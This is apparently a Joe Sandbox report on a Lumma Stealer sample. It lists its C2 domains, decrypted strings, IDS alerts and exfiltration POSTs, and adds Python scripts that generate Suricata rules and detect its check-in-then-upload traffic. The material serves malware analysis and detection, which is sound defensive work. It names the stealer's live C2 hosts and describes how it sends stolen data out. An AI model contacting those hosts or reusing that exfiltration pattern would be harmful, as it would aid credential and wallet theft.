
Windows Analysis Report
0WO49yZcDA.exe

Overview

General Information

Sample name: 0WO49yZcDA.exe (renamed because the original name is a hash value)
Original sample name: 91e4f1ab8170b4af79ec38f14533f6c4.exe
Analysis ID: 1578981
MD5: 91e4f1ab8170b4af79ec38f14533f6c4
SHA1: 1b34ee9ec2d2bb2f861a30f7adc6c878e27511ec
SHA256: bb5655c486554fcceffdd7df4042befb5e22f3226713f4987292203773c984d0
Tags: exe, user-abuse_ch

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected potential crypto function
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • 0WO49yZcDA.exe (PID: 1732 cmdline: "C:\Users\user\Desktop\0WO49yZcDA.exe" MD5: 91E4F1AB8170B4AF79EC38F14533F6C4)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Blogpost URLs / Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
Caveat for this sample: the decrypted string table still contains "TeslaBrowser/5.5" (see the String decryptor entries under AV Detection), but every observed POST to /api carries a Chrome/119 user agent (see Networking). A detection keyed only on the TeslaBrowser user agent misses this build; key on the C2 domains, the /api check-in plus multipart upload pattern, or the JA3 hash instead.
Malware configuration (LummaC): {"C2 url": ["sustainskelet.lat", "rapeflowwj.lat", "grannyejh.lat", "crosshuaht.lat", "necklacebudi.lat", "energyaffai.lat", "aspecteirs.lat", "discokeyus.lat", "sweepyribs.lat"], "Build id": "PsFKDg--pablo"}
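The extracted configuration is the actionable part of this report. The script below is an added example (not part of the Joe Sandbox report and not Joe Security tooling) that turns such an extractor output into defanged IOC lines and local Suricata rules for DNS lookups and TLS SNI of the listed C2 domains, plus a rule on the JA3 hash listed under Networking. The configuration and hash are copied from this report; the SID range (1000000+), rule messages, classtypes and the domain validation are the example's own choices, and the JA3 rule assumes JA3 fingerprinting is enabled in suricata.yaml.

```python
"""Turn a LummaC configuration recovered by a sandbox into hunting artefacts.

Added example, not part of the Joe Sandbox report or Joe Security tooling.
LUMMA_CONFIG is copied from the report's Malware Configuration Extractor
output and JA3_HASH from the report's Networking section; everything else
(SID range, rule messages, classtypes) is this example's own choice.
"""
import json
import re

LUMMA_CONFIG = {
    "C2 url": ["sustainskelet.lat", "rapeflowwj.lat", "grannyejh.lat",
               "crosshuaht.lat", "necklacebudi.lat", "energyaffai.lat",
               "aspecteirs.lat", "discokeyus.lat", "sweepyribs.lat"],
    "Build id": "PsFKDg--pablo",
}
JA3_HASH = "a0e9f5d64349fb13191bc781f81f42e1"

# Bare hostname only: labels of letters/digits/hyphen, an alphabetic TLD,
# 253 chars max. Anything else (quotes, semicolons, schemes, paths) is
# rejected so a corrupt or hostile config cannot break the generated rules.
_DOMAIN_RE = re.compile(r"^(?=.{1,253}$)(?:[a-z0-9-]{1,63}\.)+[a-z]{2,63}$")


def parse_extractor_output(text):
    """Parse the extractor line as printed in the report, which may carry a
    leading family label such as 'LummaC {...}'."""
    return json.loads(text[text.index("{"):])


def c2_domains(config):
    """Return the C2 hosts lower-cased, de-duplicated, order preserved.
    The extractor calls the field "C2 url" but it holds bare hostnames."""
    seen, out = set(), []
    for raw in config.get("C2 url", []):
        host = raw.strip().lower().rstrip(".")
        if not _DOMAIN_RE.match(host):
            raise ValueError(f"not a bare domain: {raw!r}")
        if host not in seen:
            seen.add(host)
            out.append(host)
    return out


def defang(host):
    """Make a domain safe to paste into tickets and chat: a.lat -> a[.]lat"""
    return host.replace(".", "[.]")


def ioc_lines(config):
    """CSV-style lines (indicator,type,context) for an IOC feed, defanged."""
    build = config.get("Build id", "unknown")
    return [f"{defang(h)},domain,LummaC build {build}" for h in c2_domains(config)]


def suricata_rules(config, ja3=None, base_sid=1000000):
    """Emit Suricata (5.x+) rules: one dns.query and one tls.sni rule per C2
    domain, plus an optional ja3.hash rule. SIDs are allocated sequentially
    from base_sid (the 1000000-1999999 range is reserved for local rules)."""
    build = config.get("Build id", "unknown")
    rules, sid = [], base_sid
    for host in c2_domains(config):
        rules.append(
            f'alert dns $HOME_NET any -> any any (msg:"LOCAL LummaC C2 domain in DNS '
            f'lookup ({host}) build {build}"; dns.query; content:"{host}"; nocase; '
            f'endswith; classtype:trojan-activity; sid:{sid}; rev:1;)')
        sid += 1
        rules.append(
            f'alert tls $HOME_NET any -> $EXTERNAL_NET any (msg:"LOCAL LummaC C2 domain '
            f'in TLS SNI ({host}) build {build}"; tls.sni; content:"{host}"; nocase; '
            f'endswith; classtype:trojan-activity; sid:{sid}; rev:1;)')
        sid += 1
    if ja3:
        # Requires JA3 fingerprinting to be enabled in suricata.yaml. A JA3 hash
        # identifies a TLS client stack, not this malware alone, so keep it at
        # a lower priority than the domain rules.
        rules.append(
            f'alert tls $HOME_NET any -> $EXTERNAL_NET any (msg:"LOCAL JA3 seen with '
            f'LummaC build {build}"; ja3.hash; content:"{ja3}"; classtype:bad-unknown; '
            f'priority:3; sid:{sid}; rev:1;)')
    return rules


if __name__ == "__main__":
    print("\n".join(ioc_lines(LUMMA_CONFIG)))
    print("\n".join(suricata_rules(LUMMA_CONFIG, ja3=JA3_HASH)))
```

The `endswith` anchor on `dns.query` and `tls.sni` matters: matching `content:"discokeyus.lat"` without it would also fire on `discokeyus.lat.evil.example`, while with it a subdomain such as `cdn.discokeyus.lat` still matches. The JA3 hash in this report is shared by other tooling (the ET rule that fired on it is a generic "Possible Malware" signature), so it is emitted at priority 3 as a supporting indicator rather than a standalone verdict.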
Source | Rule | Description | Author
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security
00000000.00000003.2412277604.0000000001996000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000003.2412704361.0000000001996000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000003.2503586892.0000000001996000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000003.2437512461.0000000001996000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000003.2462451964.0000000001996000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
(5 further Yara matches are collapsed in the original report; the Strings column is empty for every row shown)
                No Sigma rule has matched
Suricata IDS alerts

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-20T17:24:43.662669+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49717 | 104.21.21.99 | 443 | TCP
2024-12-20T17:24:45.850636+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49721 | 104.21.21.99 | 443 | TCP
2024-12-20T17:24:48.675771+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49724 | 104.21.21.99 | 443 | TCP
2024-12-20T17:24:51.065025+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49727 | 104.21.21.99 | 443 | TCP
2024-12-20T17:24:53.773140+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49728 | 104.21.21.99 | 443 | TCP
2024-12-20T17:24:56.161439+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49731 | 104.21.21.99 | 443 | TCP
2024-12-20T17:24:58.990580+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49732 | 104.21.21.99 | 443 | TCP
2024-12-20T17:25:02.023218+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49734 | 104.21.21.99 | 443 | TCP
2024-12-20T17:24:44.423127+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49717 | 104.21.21.99 | 443 | TCP
2024-12-20T17:24:46.842774+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49721 | 104.21.21.99 | 443 | TCP
2024-12-20T17:24:44.423127+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.5 | 49717 | 104.21.21.99 | 443 | TCP
2024-12-20T17:24:46.842774+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.5 | 49721 | 104.21.21.99 | 443 | TCP
2024-12-20T17:24:43.662669+0100 | 2058361 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 49717 | 104.21.21.99 | 443 | TCP
2024-12-20T17:24:45.850636+0100 | 2058361 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 49721 | 104.21.21.99 | 443 | TCP
2024-12-20T17:24:48.675771+0100 | 2058361 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 49724 | 104.21.21.99 | 443 | TCP
2024-12-20T17:24:51.065025+0100 | 2058361 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 49727 | 104.21.21.99 | 443 | TCP
2024-12-20T17:24:53.773140+0100 | 2058361 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 49728 | 104.21.21.99 | 443 | TCP
2024-12-20T17:24:56.161439+0100 | 2058361 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 49731 | 104.21.21.99 | 443 | TCP
2024-12-20T17:24:58.990580+0100 | 2058361 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 49732 | 104.21.21.99 | 443 | TCP
2024-12-20T17:25:02.023218+0100 | 2058361 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 49734 | 104.21.21.99 | 443 | TCP
2024-12-20T17:24:42.292481+0100 | 2058360 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 54618 | 1.1.1.1 | 53 | UDP
2024-12-20T17:24:42.151073+0100 | 2058364 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 57795 | 1.1.1.1 | 53 | UDP
2024-12-20T17:24:42.007547+0100 | 2058378 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 62912 | 1.1.1.1 | 53 | UDP
2024-12-20T17:24:57.205488+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49731 | 104.21.21.99 | 443 | TCP


                AV Detection

Source: 0WO49yZcDA.exe | Avira: detected
Source: 0WO49yZcDA.exe.1732.0.memstrmin | Malware Configuration Extractor: LummaC {"C2 url": ["sustainskelet.lat", "rapeflowwj.lat", "grannyejh.lat", "crosshuaht.lat", "necklacebudi.lat", "energyaffai.lat", "aspecteirs.lat", "discokeyus.lat", "sweepyribs.lat"], "Build id": "PsFKDg--pablo"}
Source: 0WO49yZcDA.exe | ReversingLabs: Detection: 65%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: 0WO49yZcDA.exe | Joe Sandbox ML: detected
Source: 00000000.00000002.2513053695.0000000000F71000.00000040.00000001.01000000.00000003.sdmp | String decryptor, recovered strings (verbatim, including the malware's own misspelling "Resoluton"):
    rapeflowwj.lat
    crosshuaht.lat
    sustainskelet.lat
    aspecteirs.lat
    energyaffai.lat
    necklacebudi.lat
    discokeyus.lat
    grannyejh.lat
    sweepyribs.lat
    lid=%s&j=%s&ver=4.0
    TeslaBrowser/5.5
    - Screen Resoluton:
    - Physical Installed Memory:
    Workgroup: -
    PsFKDg--pablo
Source: 0WO49yZcDA.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.5:49717 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.5:49721 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.5:49724 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.5:49727 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.5:49728 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.5:49731 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.5:49732 version: TLS 1.2

                Networking

Source: Network traffic | Suricata IDS: 2058378 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat) : 192.168.2.5:62912 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058360 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat) : 192.168.2.5:54618 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.5:49717 -> 104.21.21.99:443
Source: Network traffic | Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.5:49721 -> 104.21.21.99:443
Source: Network traffic | Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.5:49732 -> 104.21.21.99:443
Source: Network traffic | Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.5:49731 -> 104.21.21.99:443
Source: Network traffic | Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.5:49724 -> 104.21.21.99:443
Source: Network traffic | Suricata IDS: 2058364 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat) : 192.168.2.5:57795 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.5:49734 -> 104.21.21.99:443
Source: Network traffic | Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.5:49727 -> 104.21.21.99:443
Source: Network traffic | Suricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.5:49728 -> 104.21.21.99:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49717 -> 104.21.21.99:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49717 -> 104.21.21.99:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49731 -> 104.21.21.99:443
Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49721 -> 104.21.21.99:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49721 -> 104.21.21.99:443
Source: Malware configuration extractor | URLs: sustainskelet.lat, rapeflowwj.lat, grannyejh.lat, crosshuaht.lat, necklacebudi.lat, energyaffai.lat, aspecteirs.lat, discokeyus.lat, sweepyribs.lat
Source: Joe Sandbox View | IP Address: 104.21.21.99
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49717 -> 104.21.21.99:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49721 -> 104.21.21.99:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49732 -> 104.21.21.99:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49731 -> 104.21.21.99:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49724 -> 104.21.21.99:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49734 -> 104.21.21.99:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49727 -> 104.21.21.99:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49728 -> 104.21.21.99:443
Source: global traffic | HTTP traffic detected: seven POST /api HTTP/1.1 requests to Host: discokeyus.lat, each with Connection: Keep-Alive and User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36, as listed in the report:
    Content-Type | Content-Length
    application/x-www-form-urlencoded | 8
    application/x-www-form-urlencoded | 47
    multipart/form-data; boundary=0BYKMF78EM1G5TZVS53 | 12841
    multipart/form-data; boundary=IT89N01QY0 | 15029
    multipart/form-data; boundary=YDADZDCTSSFX6QBKKQ | 20567
    multipart/form-data; boundary=YEI62A1UWSBO | 1220
    multipart/form-data; boundary=Z3PDZSBFPSX6O | 550974
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (reported three times)
Source: global traffic | DNS traffic detected: DNS query: sweepyribs.lat
Source: global traffic | DNS traffic detected: DNS query: grannyejh.lat
Source: global traffic | DNS traffic detected: DNS query: discokeyus.lat
Source: unknown | HTTP traffic detected: POST /api HTTP/1.1 to Host: discokeyus.lat with Content-Type: application/x-www-form-urlencoded and Content-Length: 8 (same Connection and User-Agent headers as the requests above)
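The POSTs listed above show the check-in and exfiltration shape of this sample: small application/x-www-form-urlencoded requests to /api first, then multipart/form-data uploads of varying size to the same host and path, all with a Chrome/119 user agent but none of the Accept, Accept-Language or sec-ch-ua headers a real Chrome POST carries. The Python below is an added example (not Joe Sandbox code) that looks for that shape in HTTP proxy or sandbox request logs rather than for a fixed user agent or domain. The request heads in its sample log are rebuilt from the header values printed in this report; the timestamps, the second client 192.168.2.7 and the hosts files.example.com and example.com are constructed noise that the detector is expected to ignore.

```python
"""Flag the LummaC check-in then exfiltration shape in HTTP request logs.

Added example, not part of the Joe Sandbox report. The request heads in
SAMPLE_LOG are rebuilt from the header values printed in the report; the
timestamps, the second client 192.168.2.7 and the hosts files.example.com and
example.com are constructed noise so the detector has something to ignore.
"""
from collections import defaultdict
from datetime import datetime, timedelta

LUMMA_UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
            "(KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36")
# Headers a real browser POST carries and which the sample's requests lack.
BROWSER_HEADERS = ("accept", "accept-language", "sec-ch-ua")


def _c2_post(ctype, length):
    """Request head exactly as the report shows it (header order included)."""
    return ("POST /api HTTP/1.1\r\nConnection: Keep-Alive\r\n"
            f"Content-Type: {ctype}\r\nUser-Agent: {LUMMA_UA}\r\n"
            f"Content-Length: {length}\r\nHost: discokeyus.lat\r\n\r\n")


T0 = datetime(2024, 12, 20, 17, 24, 43)  # constructed; near the report's first TLS alert
SAMPLE_LOG = [  # (timestamp, client ip, raw request head)
    (T0, "192.168.2.5", _c2_post("application/x-www-form-urlencoded", 8)),
    (T0 + timedelta(seconds=2), "192.168.2.5", _c2_post("application/x-www-form-urlencoded", 47)),
    (T0 + timedelta(seconds=5), "192.168.2.5", _c2_post("multipart/form-data; boundary=0BYKMF78EM1G5TZVS53", 12841)),
    (T0 + timedelta(seconds=7), "192.168.2.5", _c2_post("multipart/form-data; boundary=IT89N01QY0", 15029)),
    (T0 + timedelta(seconds=10), "192.168.2.5", _c2_post("multipart/form-data; boundary=YDADZDCTSSFX6QBKKQ", 20567)),
    (T0 + timedelta(seconds=13), "192.168.2.5", _c2_post("multipart/form-data; boundary=YEI62A1UWSBO", 1220)),
    (T0 + timedelta(seconds=14), "192.168.2.5", _c2_post("multipart/form-data; boundary=Z3PDZSBFPSX6O", 550974)),
    # Constructed benign traffic: one browser file upload (single multipart POST,
    # browser headers present, no preceding form check-in) and a GET.
    (T0 + timedelta(seconds=9), "192.168.2.7",
     "POST /upload HTTP/1.1\r\nHost: files.example.com\r\nUser-Agent: " + LUMMA_UA +
     "\r\nAccept: */*\r\nAccept-Language: en-US\r\nContent-Type: multipart/form-data; "
     "boundary=----WebKitFormBoundary7MA4YWxk\r\nContent-Length: 40000\r\n\r\n"),
    (T0 + timedelta(seconds=11), "192.168.2.7",
     "GET / HTTP/1.1\r\nHost: example.com\r\nUser-Agent: " + LUMMA_UA + "\r\nAccept: */*\r\n\r\n"),
]


def parse_request_head(raw):
    """Split an HTTP/1.x request head into (method, path, headers).
    Header names are lower-cased; duplicates keep the last value."""
    lines = raw.strip().split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def find_lumma_like_sessions(log, window=timedelta(minutes=5),
                             checkin_max_bytes=256, min_uploads=2):
    """Group POSTs by (client, host, path). Flag a group in which a small
    application/x-www-form-urlencoded POST (the check-in) is followed within
    `window` by at least `min_uploads` multipart/form-data POSTs (the loot).
    Returns {(client, host, path): summary dict}."""
    groups = defaultdict(list)
    for ts, client, raw in log:
        method, path, h = parse_request_head(raw)
        if method == "POST":
            groups[(client, h.get("host", "").lower(), path)].append((ts, h))

    hits = {}
    for key, reqs in groups.items():
        reqs.sort(key=lambda r: r[0])
        checkins = [(ts, h) for ts, h in reqs
                    if h.get("content-type", "").startswith("application/x-www-form-urlencoded")
                    and int(h.get("content-length", "0")) <= checkin_max_bytes]
        if not checkins:
            continue
        first = checkins[0][0]
        uploads = [(ts, h) for ts, h in reqs
                   if h.get("content-type", "").startswith("multipart/form-data")
                   and first < ts <= first + window]
        if len(uploads) < min_uploads:
            continue
        ua = reqs[0][1].get("user-agent", "")
        hits[key] = {
            "checkins": len(checkins),
            "uploads": len(uploads),
            "exfil_bytes": sum(int(h.get("content-length", "0")) for _, h in uploads),
            "first_seen": first,
            "last_seen": uploads[-1][0],
            "user_agent": ua,
            # Supporting indicator: a browser UA on requests that carry none of
            # the headers browsers add. Not decisive on its own.
            "browser_ua_without_browser_headers":
                ua.startswith("Mozilla/") and not any(k in reqs[0][1] for k in BROWSER_HEADERS),
        }
    return hits


if __name__ == "__main__":
    for (client, host, path), s in find_lumma_like_sessions(SAMPLE_LOG).items():
        print(f"{client} -> {host}{path}: {s['checkins']} check-in(s), "
              f"{s['uploads']} upload(s), {s['exfil_bytes']} bytes, "
              f"{s['first_seen']:%H:%M:%S}-{s['last_seen']:%H:%M:%S}")
```

On the sample log the only hit is 192.168.2.5 -> discokeyus.lat/api with 2 check-ins and 5 uploads totalling 600631 bytes within 14 seconds; the single-upload browser session to files.example.com is not flagged because nothing precedes it that looks like a check-in. The grouping key deliberately includes the path, since Lumma reuses one endpoint for both phases; a stealer that checks in on one path and uploads on another would need the key relaxed to (client, host).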
Source: 0WO49yZcDA.exe, 00000000.00000003.2412623188.00000000061AD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: 0WO49yZcDA.exe, 00000000.00000003.2412623188.00000000061AD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: 0WO49yZcDA.exe, 00000000.00000003.2412623188.00000000061AD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: 0WO49yZcDA.exe, 00000000.00000003.2412623188.00000000061AD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: 0WO49yZcDA.exe, 00000000.00000003.2412623188.00000000061AD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: 0WO49yZcDA.exe, 00000000.00000003.2412623188.00000000061AD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: 0WO49yZcDA.exe, 00000000.00000003.2412623188.00000000061AD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: 0WO49yZcDA.exe, 00000000.00000003.2412623188.00000000061AD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: 0WO49yZcDA.exe, 00000000.00000003.2412623188.00000000061AD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: 0WO49yZcDA.exe, 00000000.00000003.2412623188.00000000061AD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
Source: 0WO49yZcDA.exe, 00000000.00000003.2412623188.00000000061AD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
Source: 0WO49yZcDA.exe, 00000000.00000003.2361764158.00000000060DD000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2362069242.00000000060DA000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2361878999.00000000060DA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 0WO49yZcDA.exe, 00000000.00000003.2415423962.000000000613E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: 0WO49yZcDA.exe, 00000000.00000003.2415423962.000000000613E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: 0WO49yZcDA.exe, 00000000.00000003.2361764158.00000000060DD000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2362069242.00000000060DA000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2361878999.00000000060DA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 0WO49yZcDA.exe, 00000000.00000003.2361764158.00000000060DD000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2362069242.00000000060DA000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2361878999.00000000060DA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
